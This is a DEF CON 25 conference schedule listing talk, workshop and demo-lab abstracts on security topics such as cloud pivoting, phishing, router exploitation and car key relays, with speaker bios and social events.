Bryson is the Founder of GRIMM, a hacking firm for network, system, and embedded devices. He has a special interest in automotive, industrial control, SCADA, and embedded system security, and has been building over the past year a patent-pending platform approach to automated enterprise risk assessment based on offensive security, CROSSBOWTM. Prior to founding GRIMM, Bryson led an elite offensive research & development division contributing directly to national security priorities. He is a West Point grad and did a stint with tanks (ask him why you’re a “crunchie”) and tactical communications. Twitter: @brysonbort @grimmcyber



Bio: Atlas

Atlas is a doer of stuff -- with proven expertise in programmatic reverse-engineering, automated vulnerability discovery and exploitation, and breaking into or out of anything related to a computer. Special hacking interests include exploiting automobiles, power systems and industrial control systems, locks, drones, or any other kind of embedded device. He’s a four time DEFCON CTF winner, is always entertaining, educational, and fun. His day job includes breaking stuff at GRIMM. Twitter: @at1as @grimmcyber


Return to Index      -     

 

Night Life - Octavius 5-8 - Saturday - 21:00-26:00


Title:
GRIMM's AWESOME Arcade Party

The giant 16 person LED foosball tables are coming back to DEF CON! GRIMM is hosting an arcade party with tons of old school arcade games and great music. Come join the party!
Return to Index      -     

 

Demolabs - Table 2 - Sunday - 12:00-13:50


Gumbler

Willis Vandevanter

Sunday from 1200-1350 at Table Two

Audience: Offense, AppSec

The tool searches the entire commit history of a Git project for secrets and files. This is a different approach from other tools which focus on the current revision. It's excellent at digging up API keys, deleted usernames and passwords or files that are now cloaked from .gitignore.

https://github.com/BuffaloWill/gumbler

Willis Vandevanter
Willis Vandevanter is a principal at Silent Robot Systems. Prior to SRS, Will was a Senior Researcher at Onapsis and Lead Penetration Tester at Rapid7. He has previously spoken at Blackhat, DEFCON, TROOPERS, and other conferences. In his spare time, he writes code and contributes to different projects.


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 12:00-12:59


Title:
Gun control - You cant put the Genie back into its bottle

1200 Friday
Michael E. Taylor, Attorney at Law
@mingheemouse
Gun control - You cant put the Genie back into its bottle

Michael E. Taylor, Attorney at Law, firearms law specialist and amateur gunsmith, will lead you through the futility of gun control by explaining how anyone, anywhere on the planet, can cheaply and easily assemble a fully functional firearm and make their own self-contained ammunition for that firearm, with simple hand tools, all using absolutely no firearm specific components. The technologies demonstrated herein are all public domain. All predate ITAR, with most dating back to the mid 19th century. The legality of personal firearm construction varies from jurisdiction to jurisdiction, so mind your local laws.

Return to Index      -     

 

Night Life - Track 2 - Friday - 20:00-24:00


Title:
Hacker Jeopardy

Hacker Jeopardy
Return to Index      -     

 

Night Life - Track 2 - Saturday - 20:00-24:00


Title:
Hacker Jeopardy

Hacker Jeopardy
Return to Index      -     

 

Night Life - Roman 1, Promenade Level - Friday - 20:00-26:00


Title:
Hacker Karaoke

Our 9th year! Celebrate with us and with others who love to sing. Do you like music? Do you like performances? Want to BE the performer? Want to have that "Hold my beer moment" do your best and not injured? Well trot your happy ass down to Hacker Karaoke, DEF CON's on-site karaoke experience. You can be a star, or if you don't want to be a star, you can also take pride in making an utter fool of yourself.
Return to Index      -     

 

Night Life - Roman 1, Promenade Level - Saturday - 20:00-26:00


Title:
Hacker Karaoke

Our 9th year! Celebrate with us and with others who love to sing. Do you like music? Do you like performances? Want to BE the performer? Want to have that "Hold my beer moment" do your best and not injured? Well trot your happy ass down to Hacker Karaoke, DEF CON's on-site karaoke experience. You can be a star, or if you don't want to be a star, you can also take pride in making an utter fool of yourself.
Return to Index      -     

 

SEV - Emperors BR II - Friday - 18:25-19:15



Friday July 28 6:25PM 50 mins

Hackers gonna hack – But do they know why?
Hackers gonna hack – But do they know why? Previous academic studies have investigated the psychological aspects of information security, but the focus has been on social engineering or attempts to define hacker characteristics/motivations. This neglects the wider social psychological processes that influence everyone who takes part in online communities. These processes are important; they determine how we understand, perceive and interact with the members of our own group and the groups around us. What is especially notable from social psychological research are the many mistakes people make in trying to interpret those around us, mistakes which can lead to underestimating risk or creating unnecessary tensions.

This talk will explore how social psychological research should be used to improve understanding of all the groups who may be involved in an information security incident. Regardless of how much of an anarchist or rebel we might be, it will be discussed how individuals are strongly influenced by the norms and identity of their group – and whether this is a good thing or not.

Helen Thackaray: @hel_ty
Helen is a PhD candidate at Bournemouth University (UK). The work presented in this talk is part of research for the doctoral thesis. Despite having qualifications in neither, she is based in the departments of Psychology and Computing. She spends most of her time on different internet forums and still finds it amazing that the university pays her do this. Her research aims to examine group identity and group processes online, highlight the importance of social psychology in information security, and further education about informed decision making online.


Return to Index      -     

 

DEFCON - Track 4 - Friday - 12:00-12:45


Hacking Democracy: A Socratic Dialogue

Friday at 12:00 in Track 4

45 minutes

Mr. Sean Kanuck Stanford University, Center for International Security and Cooperation

In the wake of recent presidential elections in the US and France, "hacking" has taken on new political and social dimensions around the globe. We are now faced with a world of complex influence operations and dubious integrity of information. What does that imply for democratic institutions, legitimacy, and public confidence?

This session will explore how liberal democracy can be hacked — ranging from direct manipulation of electronic voting tallies or voter registration lists to indirect influence over mass media and voter preferences — and question the future role of "truth" in open societies. Both domestic partisan activities and foreign interventions will be considered on technical, legal, and philosophical grounds. The speaker will build on his experience as an intelligence professional to analyze foreign capabilities and intentions in the cyber sphere in order to forecast the future of information warfare. Audience members will be engaged in a Socratic dialogue to think through how modern technologies can be used to propagate memes and influence the electorate. The feasibility of, and public policy challenges associated with, various approaches to hacking democracy will also be considered. This conceptual discussion of strategic influence campaigns will not require any specific technical or legal knowledge

Mr. Sean Kanuck
Sean Kanuck is an attorney and strategic consultant who advises governments, corporations, and entrepreneurs on the future of information technology. Sean is affiliated with Stanford University's Center for International Security and Cooperation and has received several international appointments, including: Chair of the Research Advisory Group for the Global Commission on the Stability of Cyberspace (Hague, Netherlands), Distinguished Visiting Fellow at Nanyang Technological University (Singapore), and Distinguished Fellow with the Observer Research Foundation (New Delhi, India). He regularly gives keynote addresses for global audiences on a variety of cyber topics, ranging from risk analysis to identity intelligence to arms control.

Sean served as the United States' first National Intelligence Officer for Cyber Issues from 2011 to 2016. He came to the National Intelligence Council after a decade of experience in the Central Intelligence Agency's Information Operations Center, including both analytic and field assignments. In his Senior Analytic Service role, he was a contributing author for the 2009 White House Cyberspace Policy Review, an Intelligence Fellow with the Directorates for Cybersecurity and Combating Terrorism at the National Security Council, and a member of the United States delegation to the United Nations Group of Governmental Experts on international information security.

Prior to government service, Sean practiced law with Skadden Arps in New York, where he specialized in mergers and acquisitions, corporate finance, and banking matters. He is admitted to the bar in New York and Washington DC, and his academic publications focus on information warfare and international law. Sean holds degrees from Harvard University (A.B., J.D.), the London School of Economics (M.Sc.), and the University of Oslo (LL.M.). He also proudly serves as a Trustee of the Center for Excellence in Education, a charity promoting STEM education that is based in McLean, Virginia.

@seankanuck


Return to Index      -     

 

DEFCON - Capri Room - Friday - 20:00-21:59


Hacking Democracy

Friday at 20:00 - 22:00 in Capri Room

Evening Lounge

Mr. Sean Kanuck Stanford University, Center for International Security and Cooperation

Are you curious about the impact of fake news and influence operations on elections? Are you concerned about the vulnerability of democratic institutions, the media, and civil society? Then come engage with your peers and the first US National Intelligence Officer for Cyber Issues on ways to hack democracy. He will: (1) provide a low-tech, strategic analysis of recent events, foreign intelligence threats, and the future of information warfare; (2) lead a Socratic dialogue with attendees about the trade-offs between national security and core democratic values (such as freedom, equality, and privacy); and (3) open the floor to audience questions and/or a moderated group debate.

This session is intended to be informal and participatory. It will cover a range of issues from supply chain attacks on voting machines to psychological operations by using an interdisciplinary approach that encompasses constitutional law, world history, game theory, social engineering, and international affairs. The discussion will occur against the backdrop of cyber security and critical infrastructure protection, but it will not examine any specific hardware or software systems; rather, it will concern the conceptual formulation and conduct of modern strategic influence campaigns. No specific knowledge is required, but a skeptical mind and mischievous intellect are a must.

Mr. Sean Kanuck
Sean Kanuck is an attorney and strategic consultant who advises governments, corporations, and entrepreneurs on the future of information technology. Sean is affiliated with Stanford University's Center for International Security and Cooperation and has received several international appointments, including: Chair of the Research Advisory Group for the Global Commission on the Stability of Cyberspace (Hague, Netherlands), Distinguished Visiting Fellow at Nanyang Technological University (Singapore), and Distinguished Fellow with the Observer Research Foundation (New Delhi, India). He regularly gives keynote addresses for global audiences on a variety of cyber topics, ranging from risk analysis to identity intelligence to arms control.

Sean served as the United States' first National Intelligence Officer for Cyber Issues from 2011 to 2016. He came to the National Intelligence Council after a decade of experience in the Central Intelligence Agency's Information Operations Center, including both analytic and field assignments. In his Senior Analytic Service role, he was a contributing author for the 2009 White House Cyberspace Policy Review, an Intelligence Fellow with the Directorates for Cybersecurity and Combating Terrorism at the National Security Council, and a member of the United States delegation to the United Nations Group of Governmental Experts on international information security.

Prior to government service, Sean practiced law with Skadden Arps in New York, where he specialized in mergers and acquisitions, corporate finance, and banking matters. He is admitted to the bar in New York and Washington DC, and his academic publications focus on information warfare and international law. Sean holds degrees from Harvard University (A.B., J.D.), the London School of Economics (M.Sc.), and the University of Oslo (LL.M.). He also proudly serves as a Trustee of the Center for Excellence in Education, a charity promoting STEM education that is based in McLean, Virginia.

@seankanuck


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 1 - Saturday - 14:30-18:30


Hacking Network Protocols using Kali

Saturday, 14:30 to 18:30 in Octavius 1

Thomas Wilhelm Security Solutions Expert, HP Inc.

John Spearing

There are a lot of hacking tutorials on how to compromise servers, but what about network devices? In this workshop, we will demonstrate how to conduct penetration tests against a number of different network protocols, specifically those at layer 2 and 3 of the OSI model, in order to assess and circumvent the security of an organization. Participants will be able to watch a demonstration on how to leverage insecurities in different protocols, and replicate the attacks themselves in a lab environment at the workshop. In addition, we will discuss what steps network engineers can do to limit the insecurities.
This workshop will contain network devices in which participants will be able to connect to and perform the demonstrated attacks. Participation will be reduced since network equipment resources are limited, unless additional lab equipment can be procured.

Prerequisites: Since the subject matter discusses network protocols, it is required for students to understand the OSI model and specifics of well-known network protocols, particularly those found at layer 2 and layer 3 of the OSI model.

Materials: Since this is an advanced penetration testing subject, participants should have a laptop that contains an up to date Kali Linux image. In addition, if they want to participate in actual network protocol attacks, they should bring CAT5 cables for connectivity. This class will not spend time getting students online - participants should already be familiar with configuring static IP addresses and/or DHCP for their systems. Because participants will be able to connect to a lab environment with active exploits, it is suggested that students use a computer system that can be easily re-imaged at the end of the workshop.

Max students: 32 | Registration: https://dc25_wilhelm.eventbrite.com/ (Sold out!)

Thomas Wilhelm
Thomas Wilhelm has been an associate professor at an NSACAE university, who has taught information assurance for many years at both the masters and undergraduate level. He has been a penetration tester and team lead for fortune 100 companies, and spent the last 20+ years involved in information security. Thomas has written and authored numerous articles and books over the years on hacking; the latest is titled "Professional Penetration Testing (vol 2)," published by Syngress, which has been printed in multiple languages. Thomas holds two masters degrees (MSCS, MSM) and maintains the following certifications: ISSMP, CISSP, CCNP Security, SCSECA, SCNA, SCSA, IEM, IAM

John Spearing
John Spearing works in the field of network and physical security, and has obtained a Masters Degree in both Computer Science and Organizational Behavior. John is the co-founder and Operations Manager of the MSSP company known as Crystal Defense Network Information Security, located in central Colorado. John's specialty within the Information Security realm is centralized around network intrusion detection and prevention, as well as endpoint security.


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Friday - 10:30-11:00


Title:
Hacking on Multiparty Computation

Name:
Matt Cheung

Abstract:
Secure multiparty computation is about jointly computing a function while keeping each parties inputs secret. This comes off as an esoteric area of cryptography, but the goal of this talk is to introduce you to the core concepts through a history of the topic. I will conclude by demoing an implementation of an example protocol I implemented.

Bio:
Matt Cheung started developing his interest in cryptography during an internship in 2011. He worked on implementation of a secure multi-party protocol by adding elliptic curve support to an existing secure text pattern matching protocol. From this experience he has given talks and workshops at the Boston Application Security Conference and the DEF CON Crypto and Privacy Village.
Twitter handle of presenter(s): nullpsifer

Return to Index      -     

 

DEFCON - Track 3 - Friday - 11:00-11:45


Hacking Smart Contracts

Friday at 11:00 in Track 3

45 minutes | Demo

Konstantinos Karagiannis Chief Technology Officer, Security Consulting, BT Americas

It can be argued that the DAO hack of June 2016 was the moment smart contracts entered mainstream awareness in the InfoSec community. Was the hope of taking blockchain from mere cryptocurrency platform to one that can perform amazing Turing-complete functions doomed? We've learned quite a lot from that attack against contract code, and Ethereum marches on. Smart contracts are a key part of the applications being created by the Enterprise Ethereum Alliance, Quorum, and smaller projects in financial and other companies. Ethical hacking of smart contracts is a critical new service that is needed. And as is the case with coders of Solidity (the language of Ethereum smart contracts), hackers able to find security flaws in the code are in high demand.

Join Konstantinos for an introduction to a methodology that can be applied to Solidity code review ... and potentially adapted to other smart contract projects. We'll examine the few tools that are needed, as well as the six most common types of flaws, illustrated using either public or sanitized real world" vulnerabilities.

Konstantinos Karagiannis
Konstantinos Karagiannis is the Chief Technology Officer for Security Consulting at BT Americas. In addition to guiding the technical direction of ethical hacking and security engagements, Konstantinos specializes in hacking financial applications, including smart contracts and other blockchain implementations. He has spoken at dozens of technical conferences around the world, including Black Hat Europe, RSA, and ISF World Security Congress.

@konstanthacker


Return to Index      -     

 

Wireless - Florentine BR I & II - Promenade Level - Friday - 12:00-13:25


Balint Seeber

Bio

A software engineer by training, Balint is a perpetual hacker, the Director of Vulnerability Research at Bastille Networks, and guy behind spench.net. His passion is Software Defined Radio and discovering all that can be decoded from the ether, as well as extracting interesting information from lesser-known data sources and visualising them in novel ways. When not receiving electromagnetic radiation, he likes to develop interactive web apps for presenting spatial data. Originally from Australia, he moved to the United States in 2012 to pursue his love of SDR as the Applications Specialist and SDR Evangelist at Ettus Research.

@spenchdotnet

Hacking Some More of The Wireless World

Abstract

The hacking continues on from last year! Three interesting applications will be demonstrated, and their underlying theory and design explained. The audience will be exposed to some novel GNU Radio tips and DSP tricks. INMARSAT Aero will be revisited to show (in Google Earth) spatial information, such as waypoints and flight plans, that are transmitted from airline ground operations to airborne flights. A good chunk of the VHF band is used for airline communications; plane spotters enjoy listening to tower and cockpit communications. Modern SDRs can now sample the entire band, and as AM modulation is used, it's possible to use a counterintuitive, but simple, demodulator chain (first shown by Kevin Reid's wideband 'un-selective AM' receiver) to listen to the most powerful transmission. This will be demonstrated with a GNU Radio-based implementation. It is also possible to 'spatialise' the audio for the listener using stereo separation, which can convey a transmission's relative position on the spectrum. FMCW RADAR experiments are enhanced to include Doppler processing. Plotting this new velocity information, due to the Doppler effect, shows whether a target is heading toward or away from you, and often reveals targets not normally seen in range-only information - this demonstrates the true power of full RADAR signal processing. This technique will be applied to the live audio demo, a new live SDR demo, CODAR ocean current tracking, and passive RADAR exploiting powerful ATSC digital television signals (this was used to track aircraft on approach across the Bay Area).


Return to Index      -     

 

DEFCON - Track 1 - Thursday - 14:00-14:45


Hacking the Cloud

Thursday at 14:00 in 101 Track

45 minutes | Demo

Gerald Steere Cloud Wrecker, Microsoft

Sean Metcalf CTO, Trimarc

You know the ins and outs of pivoting through your target's domains. You've had the KRBTGT hash for months and laid everything bare. Or have you?

More targets today have some or all of their infrastructure in the cloud. Do you know how to follow once the path leads there? Red teams and penetration testers need to think beyond the traditional network boundaries and follow the data and services they are after. This talk will focus on how to take domain access and leverage internal access as a ticket to your target's cloud deployments.

We will also discuss round trip flights from cloud to on-premises targets and what authorizations are required to access your target's cloud deployments. While this talk is largely focused on Microsoft Azure implementations, the concepts can be applied to most cloud providers.

Gerald Steere
Gerald Steere has been a member of the C+E Red Team since joining Microsoft in June 2014. He regularly dives into the deepest corners of Azure looking for vulnerabilities unique to the cloud scale environment and collecting all the creds. Prior to that, he was a security auditor and penetration tester for three civilian Federal agencies, where he acquired a love for obtaining and cracking as many passwords as possible. He has spoken on cloud security topics at multiple BlueHat events and most recently at BSides Seattle.

@darkpawh

Sean Metcalf
Sean Metcalf is founder and principal consultant at Trimarc Security, LLC (www.TrimarcSecurity.com), which focuses on mitigating, detecting, and when possible, preventing modern attack techniques. He is one of about 100 people in the world who holds the Microsoft Certified Master Directory Services (MCM) certification, is a Microsoft MVP, and has presented on Active Directory attack and defense at BSides, Shakacon, Black Hat, DEF CON, and DerbyCon security conferences.

Sean has provided Active Directory and security expertise to government, corporate, and educational entities since Active Directory was released. He currently provides security consulting services to customers and regularly posts interesting Active Directory security information on his blog, ADSecurity.org.

@pyrotek3


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 18:00-18:59


Title:
Hacking the Law: A Call for Action Bug Bounties Legal Terms as a Case Study

1800 Friday
Amit Elazari
@amitelazari
Hacking the Law: A Call for Action Bug Bounties Legal Terms as a Case Study

While the bug bounty economy is booming, a novel survey of bug bounty terms reveals that platforms and companies often put hackers in legal harms way, shifting the risk for civil and criminal liability towards hackers instead of authorizing access and creating safe harbors. This is a call for action to hackers to unite, negotiate and influence the emerging landscape of cyberlaw, since hackers actions speak louder than scholars words. I suggest simple steps that could and should be taken, in order to minimize the legal risks of thousands of hackers participating in bug bounties, and create a rise-to-the-top competition over the quality of bug bounty terms. Hackers will learn not only which terms they should beware of in light of recent developments in anti-hacking laws, but which terms they, individually and through the platform, should demand to see to ensure authorized access. Most importantly, this is a case study of how a united front of hackers could demand and negotiate important rights, similar to what is done by organizations in other industries. Contracts and laws will continue to play a role in the highly regulated cyber landscape, conflicts of interests will inevitably arise, therefore hackers should not only pay attention to the fine print, but unite and negotiate for better terms.

Return to Index      -     

 

BHV - Pisa Room - Saturday - 10:30-10:59


Title: Hacking the Second Genetic Code using Information Theory

Speakers: Travis Lawrence

About Travis:
Travis Lawrence is currently a PhD candidate in Quantitative and Systems Biology at University of California, Merced. He developed an interest in both biodiversity and computers early in life. During college, he stumbled into the field of evolutionary biology which allowed him to pursue his interests in computer programming and biodiversity. The questions that are of the most interest to him are at the interface of evolutionary biology, genomics and bioinformatics.


Abstract:
Recent advances in genome editing have quickly turned ideas thought restricted to science fiction into reality such as custom synthetic organisms and designer babies. These technologies rely on the fidelity of the genetic code, which translates nucleotides into proteins. The underlying mechanism of translation is well understood where triplets of nucleotides, known as codons, are recognized by transfer RNAs with complementally nucleotide triplets. These transfer RNAs carry one of twenty amino acids which are then added to the growing protein chain by the ribosome. However, relatively little work has examined how a transfer RNA that recognizes a certain codon always carries the correct amino acid. The rules that determine which amino acid a transfer RNA carries have been termed the second genetic code. I have developed a computational method based on information theory that can elucidate the second genetic code from genomic sequences. Interestingly, the second genetic code is highly variable between organisms unlike the genetic code which is relatively static. I will present how my method cracks the second genetic code and how the variability of the second genetic code can be exploited to develop new treatments to combat bacterial infections and parasites, create targeted bio-controls to combat invasive species, and expand the genetic code to incorporate exotic amino acids.



Return to Index      -     

 

DEFCON - Track 2 - Friday - 10:20-10:40


Hacking travel routers like it's 1999

Friday at 10:20 in Track 2

20 minutes | Demo, Exploit

Mikhail Sosonkin Security Researcher, Synack Inc.

Digital nomads are a growing community and they need internet safety just like anyone else. Trusted security researchers have warned about the dangers of traveling through AirBnB’s. Heeding their advice, I purchased a HooToo TM06 travel router to create my own little enclave while I bounce the globe. Being a researcher myself, I did some double checking.

So, I started fuzzing and reverse engineering. While the TM06 is a cute and versatile little device - protection against network threats, it is not. In this talk, I will take you on my journey revealing my methodology for discovering and exploiting two memory corruption vulnerabilities. The vulnerabilities are severe and while they’ve been reported to the vendor, they are very revealing data points about the security state of such devices. While the device employs some exploitation mitigations, there are many missing. I will be showing how I was able to bypass them and what mitigations should’ve been employed, such as NX-Stack/Heap, canaries, etc, to prevent me from gaining arbitrary shellcode execution.

If you’re interested in security of embedded/IoT systems, travel routers or just good old fashioned MIPS hacking, then this talk is for you!

Mikhail Sosonkin
Mikhail Sosonkin is a Security Researcher at Synack where he digs into the security aspects of low level systems. He enjoys automating aspects of reverse engineering and fuzzing in order to better understand application internals. Mikhail has a CS degree from NYU, where he has also taught Application Security, and a Software Engineering masters from Oxford University. Being a builder and a hacker at heart, his interests are in vulnerability analysis, automation, malware and reverse engineering. Mikhail much enjoys speaking at such conferences as ZeroNights in Moscow and DEF CON in Las Vegas!

@hexlogic, Blog http://debugtrap.com/


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 7 - Saturday - 14:30-18:30


Harnessing the Power of Docker and Kubernetes to Supercharge Your Hacking Tactics

Saturday, 14:30 to 18:30 in Octavius 7

Anshuman Bhartiya

Anthony Bislew Red Teamer, Intuit

Running reconnaissance on a target network is almost always time-consuming and cumbersome. For experienced hackers, the process of manually enumerating and scanning target networks comes to feel like a gratuitous journey through Mordor on our way to the glory of shells, pivoting, and pilfering. Even worse, most of the automated reconnaissance solutions out there are expensive, limited in their effectiveness, opaque in their functionality...or all of the above.

What if you could automate your own customized approach to reconnaissance and exploitation by leveraging an entirely free and open-source framework to
1. Integrate the tools you trust and
2. Build tools of your own to capture those tricks that are unique to the special snowflake that is you?

In this workshop, we'll introduce you to the power of Docker and Kubernetes to supercharge your hacking tactics. We'll walk you through the process of building your tools as Docker images, scheduling and launching those tools in a Kubernetes cluster, and storing your results in a way that's easy to analyze and act upon. We'll spawn and destroy some attack environments and show how easy it is to do your testing without stressing out on how to get started. We'll even use some of the recon results to automate running exploitation tools against them and getting to the keys of the kingdom! By the end of this workshop you should have all the tools you need to build and extend your own recon and exploitation framework, that is supercharged and hyper scalable, thanks to Kubernetes.

Prerequisites: Attendees should be:
Comfortable using a MacOS/Linux shell terminal
Comfortable enough with a common scripting language (preferably Python/Ruby) to write simple tools/scripts
Familiar with command-line tools common to security professionals (e.g. curl, Nmap, etc.)
Familiar with Docker (e.g. its purpose, the concepts of containers and images, etc.)
https://www.docker.com/

Familiar with Google Cloud Platform offerings (e.g Compute Engine, Container Engine, Storage, BigQuery, etc.)
https://cloud.google.com/

A basic knowledge of Kubernetes is extremely helpful but not required. https://kubernetes.io/

Materials:
• Laptop with a Linux-based OS (preferably Mac/Ubuntu)
• A Google Cloud Platform (GCP) account - You can use the GCP Free Tier to get one. They give $300 worth of free credits which is more than enough.
• https://cloud.google.com/free/
• A Slack account configured with an incoming webhook - https://api.slack.com/incoming-webhooks
• An IDE such as Atom or Visual Studio Code.
• We will walk through installation of any other tools/software necessary such as Docker, Minikube, Google SDK, Golang, Python, etc. so you don’t have to have these pre-installed but it would help if you do.

Max students: 60 | Registration: https://dc25_bhartiya.eventbrite.com (Sold out!)

Anshuman Bhartiya
Anshuman Bhartiya has been in the IT industry for about 10 years now and has had the opportunity to wear multiple hats. Anshuman has been a web developer, cloud consultant, systems engineer and security engineer to name a few. Anshuman has a varied skillset and he likes to tinker with the latest technology coming up with innovative solutions for difficult and challenging problems. Security, Automation and Innovation are some things he is really passionate about and he firmly believes in sharing knowledge and the Open Source community. You can find some of Anshuman's work at his Github here - https://github.com/anshumanbh

Anthony Bislew
Anthony Bislew is a red teamer for the Intuit security team, with 17 prior years of experience in the IT industry. He was the co-founder of two Infrastructure as a Service (IaaS) startups and architected multiple data centers from the ground up. He is a co-founder of SD Hackers, a San Diego-based group of security professionals that come together to learn from and collaborate with each other. He is also the creator of the public penetration testing lab Infoseclabs, which was recently converted into a private security research lab for local San Diego penetration testers and researchers.


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Saturday - 14:00-15:00


Title:
Have you seen my naked selfies? Neither has my snoopy boyfriend. Privacy within a Relationship

Author:
Lauren Rucker

Abstract:
Privacy is fairly cut and dry when its US verses THEM, but what if its ME verses YOU within US? What are YOUR Privacy Rights, in the context of OUR relationship? Am I your non-trusting girlfriend? Am I your controlling boyfriend? Am I your snooping wife? Am I your abusive husband? How do YOU protect your privacy from ME? I will be providing tips, techniques, and resources to enable someone (anyone even YOU) to protect their Privacy in a relationship, perhaps even one with ME.

Highlights will include ways you can be surveilled, at home techniques you can use to protect yourself when using your phone and computer, and individual privacy rights within a marriage. Presented by someone who may have needed the information, and had to discover this path themselves, and is zealous about assisting those in need of this talk. Even YOU.

Bio:
Lauren Rucker is a threat intelligence analyst for NASA, with experience in threat assessment, vulnerability analysis, risk assessment, information gathering, correlating and reporting. Lauren is a former military intelligence officer that served at U.S. Cyber Command and U.S. Strategic Command. She is currently a graduate student earning her masters in cybersecurity and is passionate about making cybersecurity practices relatable to the average internet user.
Twitter handle of presenter(s): @laurenkrucker

Return to Index      -     

 

BHV - Pisa Room - Friday - 14:30-14:59


Title: Health as a service...

Speakers: Julian Dana

About Julian:
Julian is a Security Consultant with more than 20 years of experience. He has experience in hands-on security testing and also teaching different technical security trainings. Julian, as a frustrated doctor, was always passionate and curious about the human body.

Abstract:
The software as a service (SaaS) model is same model that we are using for our health...Unbelievable: We are treating symptoms and not curing diseases...



Return to Index      -     

 

SEV - Emperors BR II - Friday - 20:10-20:40


Friday July 28 8:10PM 30 mins

Heavy Diving for Credentials: Towards an Anonymous Phishing
Online phishing campaigns are one of the most typical social engineering exercises that can be conducted in the internet. In spite of the easiness with which fake websites can be deployed using tools such as Social Engineering Toolkit, attackers will sometimes be limited by the difficulties to achieve a sufficient amount of privacy in the case of being trapped. Thus, finding a set of platforms that can provide this anonymity and untraceability is needed to launch similar campaigns with the minimum guarantees of remaining safe.

In this session, the authors will show a proposal on how to perform this type of attacks with the example of credential harvesting in mind by  using some of the well known capabilities that the Tor ecosystem provides. During the conference, some demos will be conducted in which our baits will be prepared to be bitten by even users which are not using tor-ified browsers, by adding some simple tricks that include the exploitation of the target=”_blank” directive, the particular use of .onion subdomains in current browsers and a combination of third party gateways to maximize the chances of deceiving the victim while the attacker remains as anonymous as possible.

Yaiza Rubio: @yrubiosec
Félix Brezo: @febrezo
Yaiza Rubio is an intelligence analyst with a Bachelor of Information Sciences, Master in Intelligence Analysis, Master in Logistics and Economics of Defense and Master in Law Applied to Internet and TIC. A member of the Institute of Forensic Science and Security of the Autonomous University of Madrid and former analyst at S21sec and Isdefe, since May 2013 serves as an intelligence analyst for Eleven Paths. She is a collaborator of the Centre of Analysis and Foresight of the Spanish Guardia Civil as well as recurrent national and international Law Enforcement Agencies trainer like Europol, the Spanish Army and several police units in Spain. She also teaches in several postgraduate courses on intelligence analysis, security and open source intelligence and publishes scientific and technical content in hacking and security-related conferences like RootedCon, NavajaNegra, 8dot8, JNIC, ISACA and many others. Since May 2017, she has been awarded by the Spanish Ministry of Digital the Honorofic Cybercooperant title for her work on spreading cybersecurity awareness.

Félix Brezo is an intelligence analyst with a Computer Engineering and Industrial Organisation Engineer degree, Master in Information Security, Master in Intelligence Analysis,  Master in Law Applied to Internet and TICs and PhD in Computer Engineering and Telecommunications. Until June 2013, a researcher in computer security in the S3Lab run by the University of Deusto and, thereafter, intelligence analyst for Eleven Paths, and collaborator of the Spanish Guardia Civil’s Centre of Analysis and Foresight, as well as a recurrent Law Enforcement Agencies trainer in Spain and Europe. He teaches on intelligence analysis and security in several postgraduate courses and is also a recurrent lecturer in hacking and security-related conferences like RootedCon, NavajaNegra, 8dot8, JNIC or ISACA amongst many others.

Both authors have been leading the development of OSRFramework, a free software information gathering framework focused on the analysts which has received up to 4 different national awards in Spain for the assistance it provides to the fingerprinting phase in hacking and intelligence operations.


Return to Index      -     

 

DEFCON - Track 1 - Saturday - 17:00-17:45


Here to stay: Gaining persistency by abusing advanced authentication mechanisms

Saturday at 17:00 in 101 Track

45 minutes | Demo

Marina Simakov Security researcher, Microsoft

Igal Gofman Security researcher, Microsoft

Credentials have always served as a favorite target for advanced attackers, since these allow to efficiently traverse a network, without using any exploits.

Moreover, compromising the network might not be sufficient, as attackers strive to obtain persistency, which requires the use of advanced techniques to evade the security mechanisms installed along the way.

One of the challenges adversaries must face is: How to create threats that will continuously evade security mechanisms, and even if detected, ensure that control of the environment can be easily regained?

In this talk, we briefly discuss some of the past techniques for gaining persistency in a network (using local accounts, GPOs, skeleton key, etc.) and why they are insufficient nowadays.

Followed by a comprehensive analysis of lesser known mechanisms to achieve persistency, using non-mainstream methods (such as object manipulation, Kerberos delegation, etc.).

Finally, we show how defenders can secure their environment against such threats.

Marina Simakov
Marina Simakov is a security researcher at Microsoft, with a specific interest in network based attacks.

She holds an M.Sc in computer science, with several published articles. Gave a talk at BlueHat IL 2016 regarding attacks on local accounts.

@simakov_marina

Igal Gofman
Igal Gofman is a security Researcher at Microsoft. Igal has a proven track record in network security, research oriented development and threat intelligence.

His research interests include network security, intrusion detection and operating systems.

Before Microsoft, Igal was a Threat Response Team Lead at Check Point Software Technologies leading the development of the intrusion detection system.

@IgalGofman


Return to Index      -     

 

Demolabs - Table 6 - Sunday - 10:00-11:50


HI-Jack-2Factor

Weston Hecker

Sunday from 1000-1150 at Table Six

Audience: Offense, Defense, Hardware

There are several attacks being performed on PKES Passive key entry systems on cars. Several high profile talks this year are about stealing cars using 11 Dollar SDR and cheap devices to relay the signals from the keyfob to the immobilizer: I will be demoing a device that I made using an ardunio and a 433/315 Mhz Radio and a 2.4GHZ wireless antenna They cost about 12 dollars to make and basically add two factor authentication to your vehicle.

https://eprint.iacr.org/2010/332.pdf This was the 2009 research. Here is the modern 2017 version https://www.wired.com/2017/04/just-pair-11-radio-gadgets-can-steal-car/

Weston Hecker


Return to Index      -     

 

IOT - Main Contest Area - Friday - 13:00-13:50



Return to Index      -     

 

DEFCON - Modena - Friday - 20:00-21:59


Horror stories of a translator and how a tweet can start a war with less than 140 characters

Friday at 20:00 - 22:00 in Modena

Evening Lounge

El Kentaro Hacker

Translators are invisible, when they are present it is assumed that they know the language and are accurately translating between the languages. But how do you assure that the translator is accurately translating or working without an agenda? Although many of the case studies presented in this talk will focus on translating between different languages, the basic premise can be applied in any case where information needs to be shared among 2 or more different contexts. (i.e.: Sales vs Engineering, Government vs Private sector etc) . The talk will showcase publicly known historical cases and personal experiences where translation errors (accidental and deliberate) have lead to misunderstandings some with dire consequences. Also the talk will showcase using translators as an offensive tool (i.e.:How to create more credible fake news). We as a society consume more information and consume it faster than before, we have to be aware of the dangers that are inherit with bad translations. Also the infosec/cyber security profession because of the potential for large scale global impacts and or the need to maintain operational security poses unique considerations when translating or using a translator. This talk will highlight the unique challenges of using a translator or translations in such environments.

El Kentaro
El Kentaro / That Guy in Tokyo.

